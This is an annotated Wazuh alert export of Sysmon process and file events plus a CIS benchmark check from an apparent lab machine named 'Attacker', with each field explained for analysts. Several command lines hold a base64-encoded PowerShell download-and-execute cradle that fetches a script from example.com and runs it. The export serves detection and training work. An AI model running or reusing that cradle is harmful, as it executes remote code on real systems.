data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd5f-680a-740b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16016 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 75 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534310.1636688 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:28.2206040Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284624 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:28.201
ProcessGuid: {94294ddc-bd62-680a-760b-000000000e00}
ProcessId: 16188
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_zwznofro.2cu.ps1
CreationUtcTime: 2025-04-24 22:38:28.201
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:28.201 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd62-680a-760b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16188 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zwznofro.2cu.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:28.201 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 72 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534313.1639457 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:31.9272596Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284660 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:29.313
ProcessGuid: {94294ddc-bd65-680a-780b-000000000e00}
ProcessId: 16300
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd62-680a-760b-000000000e00}
ParentProcessId: 16188
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:29.313 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd65-680a-780b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16300 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd62-680a-760b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16188 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 76 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534314.1647528 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:32.1436825Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284661 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:32.118
ProcessGuid: {94294ddc-bd65-680a-780b-000000000e00}
ProcessId: 16300
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_5fxg3jxr.0j5.ps1
CreationUtcTime: 2025-04-24 22:38:32.118
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:32.118 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd65-680a-780b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16300 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5fxg3jxr.0j5.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:32.118 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit File Share' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit File Share' is set to 'Success and Failure'.: Status changed from failed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19013 Numeric ID of the detection rule that fired.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.6.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['3.3', '8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534315.1650297 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26158 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit File Share' is set to 'Success and Failure'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to audit attempts to access a shared folder. The recommended state for this setting is: Success and Failure. Note: There are no system access control lists (SACLs) for shared folders. If this policy setting is enabled, access to all shared folders on the system is audited. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: In an enterprise managed environment, workstations should have limited file sharing activity, as file servers would normally handle the overall burden of file sharing activities. Any unusual file sharing activity on workstations may therefore be useful in an investigation of potentially malicious activity. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit File Share Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.6.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 3.3,8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"File Share"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS, FAIL, or not applicable (the check could not be evaluated; see data.sca.check.reason). Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'auditpol.exe /get /subcategory:"File Share"' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: failed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 73 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534317.1653536 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:34.7701903Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284685 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:33.507
ProcessGuid: {94294ddc-bd69-680a-7b0b-000000000e00}
ProcessId: 7408
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd65-680a-780b-000000000e00}
ParentProcessId: 16300
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:33.507 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd69-680a-7b0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 7408 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd65-680a-780b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16300 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
